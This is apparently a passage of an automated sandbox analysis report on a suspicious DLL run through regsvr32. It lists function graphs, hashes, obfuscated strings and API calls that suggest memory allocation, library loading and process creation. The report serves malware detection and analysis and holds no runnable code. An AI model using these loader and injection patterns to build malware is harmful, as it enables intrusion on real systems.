144 29082e-290833 138->144 139->138 140->139 140->140 141->91 142->95 144->127
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.924704548.0000000000290000.00000040.00001000.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_290000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                      • API String ID: 2313188843-2517549848
                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction ID: 1403a94883d10214c5499bbd0854d671577000ef03f07f2fc84d7cef1b085270
                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction Fuzzy Hash: 2772D430628B4D8FDB29DF18C8856B9B7E1FF98305F10462DE88AD7211DB34E956CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000ADA0 Relevance: 7.8, Strings: 6, Instructions: 306COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 168 18000ada0-18000addc 169 18000ade0 168->169 170 18000ade2-18000ade8 169->170 171 18000b115-18000b28b call 180002df0 call 180001924 170->171 172 18000adee-18000adf4 170->172 185 18000b292-18000b424 call 180001924 call 1800103a0 171->185 186 18000b28d 171->186 174 18000adfa-18000ae00 172->174 175 18000b10b-18000b110 172->175 177 18000ae06-18000ae13 174->177 178 18000b42f-18000b435 174->178 175->170 181 18000ae15-18000ae3d 177->181 182 18000ae3f-18000ae6d 177->182 178->170 179 18000b43b-18000b448 178->179 184 18000ae77-18000b0e9 call 180012250 call 180001924 call 1800103a0 181->184 182->184 196 18000b0ee-18000b0f6 184->196 185->169 197 18000b42a 185->197 186->185 196->179 198 18000b0fc-18000b106 196->198 197->178 198->170
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: K$PCX$\$cN$cN$mglc
                                                                                                                      • API String ID: 0-3545230515
                                                                                                                      • Opcode ID: c1fdca24d7289c16ee968c380491a6baa18fcaf7badf80a2097371b2ab0776b6
                                                                                                                      • Instruction ID: 9d8718672c2d6d0bcf53842bce2800f73cef94a4a98ee0308dd9f663bb3f9fa5
                                                                                                                      • Opcode Fuzzy Hash: c1fdca24d7289c16ee968c380491a6baa18fcaf7badf80a2097371b2ab0776b6
                                                                                                                      • Instruction Fuzzy Hash: D2F114705053C8CBEBBADFA4D885BD97BE8FB44B44F10621EE84AEE250DBB057458B01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180017088 Relevance: 5.6, Strings: 4, Instructions: 580COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5C>$L*$a5<$fc![
                                                                                                                      • API String ID: 0-235361486
                                                                                                                      • Opcode ID: b97bc571248e38f113afb338e01918a3a6b823abb22c6ba48f105073ed6cd74d
                                                                                                                      • Instruction ID: 9998e5c752019cb6b430208424de95954be9251b1b4d5ab6f443f1bc48a175e6
                                                                                                                      • Opcode Fuzzy Hash: b97bc571248e38f113afb338e01918a3a6b823abb22c6ba48f105073ed6cd74d
                                                                                                                      • Instruction Fuzzy Hash: AB52FC7150078E8BDB89DF24C88A6DF3BB1FB58384F104619FC56862A1D7B4DA65CBC1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180026C08 Relevance: 5.5, Strings: 4, Instructions: 528COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 279 180026c08-180026cb7 call 18000488c 282 180026cba-180026cc0 279->282 283 180026cc6 282->283 284 18002701e-180027024 282->284 285 180026e8b-180027019 call 1800104b4 call 1800030dc 283->285 286 180026ccc-180026cd2 283->286 287 18002702a-180027030 284->287 288 18002716e-1800272af call 18001de84 284->288 320 18002734c-180027355 285->320 290 180026cd8-180026cde 286->290 291 180026e0a-180026e86 call 180019acc 286->291 293 180027036-18002703c 287->293 294 18002710a-180027169 call 18000da94 287->294 309 180027347 288->309 310 1800272b5-180027342 call 180002338 288->310 298 180026ce4-180026cea 290->298 299 180026e00-180026e05 290->299 315 180026def-180026dfb 291->315 301 18002709c-180027105 call 180007314 293->301 302 18002703e-180027044 293->302 294->315 307 180027369-1800273f0 call 180019acc 298->307 308 180026cf0-180026cf6 298->308 299->282 301->315 311 180027358-18002735e 302->311 312 18002704a-18002708c call 18000da94 302->312 323 1800273f5-180027415 307->323 317 180026cf8-180026cfe 308->317 318 180026d1b-180026dd6 call 1800257c8 308->318 309->320 310->315 322 180027364 311->322 311->323 312->323 329 180027092-180027097 312->329 315->282 317->311 324 180026d04-180026d19 317->324 328 180026ddb-180026de9 318->328 320->311 322->282 324->282 328->315 329->315
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$.-do$7YDt${a
                                                                                                                      • API String ID: 0-3334731176
                                                                                                                      • Opcode ID: 7c1d8a624a65d210eaf3644e481d388509668dda593a1a9ed875fce1846e7827
                                                                                                                      • Instruction ID: 407e1fc48498caf3ffe03eb6f42b81827d1d771d2b34bc3c922525223c45a6c0
                                                                                                                      • Opcode Fuzzy Hash: 7c1d8a624a65d210eaf3644e481d388509668dda593a1a9ed875fce1846e7827
                                                                                                                      • Instruction Fuzzy Hash: 55321CB1E0470DDFCB59DFA8C496AAEBBF2FB44348F00815DD806A7250DBB49619CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180007E9C Relevance: 5.4, Strings: 4, Instructions: 353COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 330 180007e9c-180007ebb 331 180007ebd 330->331 332 180007ec2-180007ec4 331->332 333 180007eca-180007ed0 332->333 334 18000818b-18000823c call 180010b00 332->334 335 180007ed6-180007edc 333->335 336 1800083f0-18000845f call 180024528 333->336 340 180008241-18000826c 334->340 338 180007ee2-180007ee8 335->338 339 180008298-1800083ee call 180019acc * 2 335->339 347 180008464-18000846e 336->347 342 180008084-180008186 call 18000da94 * 2 338->342 343 180007eee-180007ef4 338->343 339->347 344 18000827d 340->344 345 18000826e-180008278 340->345 342->331 348 180008287-18000828d 343->348 349 180007efa-180007ffa call 18001018c call 180017d58 343->349 350 180008282 344->350 345->331 348->347 354 180008293 348->354 362 180007fff-18000807f call 180014770 349->362 350->348 354->332 362->350
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: J}+$]Dr$]#$ve#
                                                                                                                      • API String ID: 0-2992722375
                                                                                                                      • Opcode ID: 7505443a93b81dc84199f2504c4524b08e5c5de8b6a084bba08ba97f84d9de0c
                                                                                                                      • Instruction ID: 29d0108b5b1a2cd5d3357197a04d28c8b4959edb6cbfe223ec27a09b653e96d7
                                                                                                                      • Opcode Fuzzy Hash: 7505443a93b81dc84199f2504c4524b08e5c5de8b6a084bba08ba97f84d9de0c
                                                                                                                      • Instruction Fuzzy Hash: 940205B1510789DFCB98CF28C8CAADD3BA1FB483A8F956219FC0697250D774D885CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180010D28 Relevance: 5.3, Strings: 4, Instructions: 283COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$m$PY<$PY<
                                                                                                                      • API String ID: 0-3790085456
                                                                                                                      • Opcode ID: 262caa4ca98461bc2a825a70ce614e35e667ed997923a009e81a6eb99c446a09
                                                                                                                      • Instruction ID: 50661b9c7e2b468ecdef7ab12e4980882228390d96dc8f814e7201a9439d9fb9
                                                                                                                      • Opcode Fuzzy Hash: 262caa4ca98461bc2a825a70ce614e35e667ed997923a009e81a6eb99c446a09
                                                                                                                      • Instruction Fuzzy Hash: 07E1BD71519784ABC388DF24C5CA94BBBF0FBD4758F906A1DF8968A260D7B0D948CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180027418 Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 380 180027418-180027437 381 18002743c-180027441 380->381 382 180027571-180027608 call 18000f0e4 381->382 383 180027447-18002744c 381->383 392 18002760d-180027612 382->392 385 180027452-180027457 383->385 386 1800274fb-180027561 call 18000da94 383->386 389 18002761d-180027683 call 180007238 385->389 390 18002745d-180027462 385->390 395 180027567-18002756c 386->395 396 18002771f-180027731 386->396 401 180027685-18002768c 389->401 402 180027696-18002771a call 1800030dc 389->402 390->392 394 180027468-1800274f6 call 1800146fc 390->394 392->396 397 180027618 392->397 394->381 395->381 397->381 401->402 402->396
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$-W
                                                                                                                      • API String ID: 0-958427004
                                                                                                                      • Opcode ID: 728f2fa872192a4342f7b489f0fee1d0bc24f9aa2d215390047f5cca10041ba4
                                                                                                                      • Instruction ID: 5c62a9e5bb0ebea80b6d8a0a4cf984ba25c03a9c6da5d3495d96dbd9c450046b
                                                                                                                      • Opcode Fuzzy Hash: 728f2fa872192a4342f7b489f0fee1d0bc24f9aa2d215390047f5cca10041ba4
                                                                                                                      • Instruction Fuzzy Hash: B791377051078D8FDB89DF24C88A6CE3FA1FB58398F514219FC4AA6260C778D699CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180020760 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 411 180020760-1800207b0 call 18000488c 414 1800207b5-1800207b7 411->414 415 180020a7f-180020b21 call 18001e890 414->415 416 1800207bd-1800207c2 414->416 420 180020b26 415->420 418 180020a63-180020a75 call 180016cd8 416->418 419 1800207c8-1800207cd 416->419 418->415 422 1800207d3-1800207d8 419->422 423 1800209cf-180020a59 call 18002618c 419->423 424 180020b2b-180020b30 420->424 427 1800209c0-1800209ca 422->427 428 1800207de-1800207e3 422->428 432 180020a5e Process32FirstW 423->432 424->414 431 180020b36-180020b4e 424->431 427->414 429 1800208c8-1800209a4 call 18000e594 428->429 430 1800207e9-1800207ee 428->430 436 1800209a9-1800209b0 429->436 430->424 433 1800207f4-1800208b3 call 180011e98 430->433 432->418 437 1800208b8-1800208c3 433->437 436->431 438 1800209b6-1800209bb 436->438 437->414 438->414
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8?5$*U
                                                                                                                      • API String ID: 0-521334962
                                                                                                                      • Opcode ID: bd09f0eaaa7d8b6cb4ee9dc7186532f8979905593fe3a50f0db8d4fa0a2c1811
                                                                                                                      • Instruction ID: 3c650e26eed24ce641433c8e3b6c77a07efdcf733da9740c3b79e05a0d27df5f
                                                                                                                      • Opcode Fuzzy Hash: bd09f0eaaa7d8b6cb4ee9dc7186532f8979905593fe3a50f0db8d4fa0a2c1811
                                                                                                                      • Instruction Fuzzy Hash: 82A15E705197889FC7A9CF28C4C979EBBE0FB94344F905A1DF8968B261C7B49A44CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180022D14 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Ze$x;UP
                                                                                                                      • API String ID: 0-2687350636
                                                                                                                      • Opcode ID: e2543b2b8656391a18bb95fcc850b47d7f0f50bdd354f5001d4117fcbe1086a9
                                                                                                                      • Instruction ID: 9eafb4431fb5aee701e4b8871ed649e130d7269efd8a768bed4b8e42c5d36229
                                                                                                                      • Opcode Fuzzy Hash: e2543b2b8656391a18bb95fcc850b47d7f0f50bdd354f5001d4117fcbe1086a9
                                                                                                                      • Instruction Fuzzy Hash: F16106B0D0474E8FCF48CFA8D8865EEBBB1FB48308F114219E959A7251C7789A45CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180026450 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z5r
                                                                                                                      • API String ID: 0-3122521650
                                                                                                                      • Opcode ID: d0a6c87f6236c6c21aa873f100b81e3b018d58d75f3d25f7ede977d7c1e8f4a7
                                                                                                                      • Instruction ID: 718a83a78f45606ae37033e31037a2514b13625af039691ffd65492d9a97755b
                                                                                                                      • Opcode Fuzzy Hash: d0a6c87f6236c6c21aa873f100b81e3b018d58d75f3d25f7ede977d7c1e8f4a7
                                                                                                                      • Instruction Fuzzy Hash: 53510F714187888FC7B9DF24C89A6CABBF0FF86304F10491DEA8D8B251DB759A45CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A01540 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 203librarymemoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 145 61a01540-61a01559 146 61a01574-61a015ba call 61a02d28 CoLoadLibrary 145->146 147 61a0155b-61a01573 145->147 150 61a015c0-61a01616 LoadLibraryW 146->150 151 61a01773-61a017c3 ExitProcess 146->151 154 61a01618-61a01625 150->154 155 61a0166d-61a016e7 atoi VirtualAlloc 150->155 152 61a01801-61a01827 RtlExitUserProcess 151->152 153 61a017c5-61a017d1 151->153 158 61a017dc-61a017eb 153->158 159 61a0163d-61a0164e 154->159 156 61a016e9-61a016fe 155->156 157 61a0173e-61a01765 155->157 162 61a01700-61a0173c 156->162 165 61a0176a-61a0176e 157->165 163 61a017d3-61a017da 158->163 164 61a017ed-61a017fe 158->164 160 61a01630-61a01637 159->160 161 61a01650-61a0166a 159->161 160->159 160->165 161->155 162->157 162->162 163->158 167 61a01830-61a01832 163->167 164->152 165->155 167->152
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$AllocVirtualatoi
                                                                                                                      • String ID: 0kernel32.dll$DllRegisterServer$Killer$VirtualAlloc$werfaulT.exE$yRcVE?B4mF1Ub^B?CTYTwZ62pm%*#*6AK)Lcw#t$$!ar6W0IsP+plZj4L
                                                                                                                      • API String ID: 2552574867-577226
                                                                                                                      • Opcode ID: 7e4cd086db316eb567412c41cbd9cb6871e241be05acf9e0ba56d7faec89a8d0
                                                                                                                      • Instruction ID: 9fe45162f6f5a7e0ead5f169d259151cfe96a64d2d6c3dbcc00486480c448d40
                                                                                                                      • Opcode Fuzzy Hash: 7e4cd086db316eb567412c41cbd9cb6871e241be05acf9e0ba56d7faec89a8d0
                                                                                                                      • Instruction Fuzzy Hash: 54710672B02A448AEB55CF55F8007A93BB2F74D7AEF4CC1259E0A43760EB79C596C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180006354 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 404 180006354-18000642f call 18000488c 407 180006435-1800064e7 call 1800195d0 404->407 408 1800064ed-180006537 CreateProcessW 404->408 407->408
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: f,
                                                                                                                      • API String ID: 963392458-4093033866
                                                                                                                      • Opcode ID: d78b71fd3b952264d2aae548a623963ef7f2e37c8d1b586cc601e8f5e47a7244
                                                                                                                      • Instruction ID: bece6d9ef495c36f3a5d89a96746cf52e1dbe081a693fdd2c437ac4eca7ce3cc
                                                                                                                      • Opcode Fuzzy Hash: d78b71fd3b952264d2aae548a623963ef7f2e37c8d1b586cc601e8f5e47a7244
                                                                                                                      • Instruction Fuzzy Hash: 0451057091C7848FDBB8DF58D08579ABBE0FB88314F20495EE48DC7255DB749984CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 61A020C0 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlCaptureContext.KERNEL32 ref: 61A020D4
                                                                                                                      • RtlLookupFunctionEntry.KERNEL32 ref: 61A020EB
                                                                                                                      • RtlVirtualUnwind.KERNEL32 ref: 61A0212D
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 61A02174
                                                                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 61A02181
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 61A02187
                                                                                                                      • TerminateProcess.KERNEL32 ref: 61A02195
                                                                                                                      • abort.MSVCRT ref: 61A0219B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278921479-0
                                                                                                                      • Opcode ID: 9baf29b56119cd197b7fdba20589df15a68996648cd5ae488002e939ebdfbad0
                                                                                                                      • Instruction ID: 2bb93638232a05f7df488745d6ee2db4947226ed272734b58cc2cf90136609d1
                                                                                                                      • Opcode Fuzzy Hash: 9baf29b56119cd197b7fdba20589df15a68996648cd5ae488002e939ebdfbad0
                                                                                                                      • Instruction Fuzzy Hash: D821D475A16F1089EB008FA1F8843C937A6BB0CB9AF480126D94D07774EF3AC5A4C305
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180006A80 Relevance: 10.5, Strings: 8, Instructions: 458COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 54$4}$JUA$rl$rl$rl$|e]$q
                                                                                                                      • API String ID: 0-1550155180
                                                                                                                      • Opcode ID: db019eadf98ca12d9e99c6ee6005392c2ef14a6030e5a02c2edde3c1221fe249
                                                                                                                      • Instruction ID: b8492a94391f6304207636f1588bd642403f4ebffebf1dcae69d8bccc68d06f5
                                                                                                                      • Opcode Fuzzy Hash: db019eadf98ca12d9e99c6ee6005392c2ef14a6030e5a02c2edde3c1221fe249
                                                                                                                      • Instruction Fuzzy Hash: 452231706087448FC3A9DF28C58A65BBBF1FB96744F108A1DF68686260DB72D849CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800213DC Relevance: 10.4, Strings: 8, Instructions: 403COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: f@$+zt$;D}$?J$B&i$C$C$EgP
                                                                                                                      • API String ID: 0-2619606407
                                                                                                                      • Opcode ID: 24f02117c4ade72fbcb004c10bbaab5a6543e29b8f52d06bdc1530e0bedab057
                                                                                                                      • Instruction ID: 6e35fed615611edcfafcbc52908e48d80cac888fd7d12d59afb7716b30df215a
                                                                                                                      • Opcode Fuzzy Hash: 24f02117c4ade72fbcb004c10bbaab5a6543e29b8f52d06bdc1530e0bedab057
                                                                                                                      • Instruction Fuzzy Hash: 0712F2B1504788CBCB9CDF68C88A6DD7BF0FF48358F605219FA4297250D7B69989CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180009488 Relevance: 9.8, Strings: 7, Instructions: 1046COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':C$*$*$>T$Nr$Pz9$~4u
                                                                                                                      • API String ID: 0-1762166304
                                                                                                                      • Opcode ID: 65e2131fd6e1afa00674089c9878fcf21afda126a660493734cb926be17950b6
                                                                                                                      • Instruction ID: 51bd79b2d58a69e495040b4220cffd87ac9540837042dba00b883a82072ef738
                                                                                                                      • Opcode Fuzzy Hash: 65e2131fd6e1afa00674089c9878fcf21afda126a660493734cb926be17950b6
                                                                                                                      • Instruction Fuzzy Hash: 1ED28E715443888BDBB9DF24D8CE7DD3BA1BB44344F20421AEC4AAE271DBB45B898B45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001C5B4 Relevance: 8.4, Strings: 6, Instructions: 882COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?o$T?$Z-f$fUb$?9$5
                                                                                                                      • API String ID: 0-3056351011
                                                                                                                      • Opcode ID: 849d61b0f48dfc06e4cadb7c189e24b77e514712aab61ae8967f7e573f89fb3e
                                                                                                                      • Instruction ID: 0894a0bf7de6e06cc435ebc9f45ba10a59171af41b5288e9adb8c217d0634f24
                                                                                                                      • Opcode Fuzzy Hash: 849d61b0f48dfc06e4cadb7c189e24b77e514712aab61ae8967f7e573f89fb3e
                                                                                                                      • Instruction Fuzzy Hash: 3FA2DB71E0470C9FCB58CFA8E48AADEBBF2FB48344F00411DE946B6250D7B49919CB99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

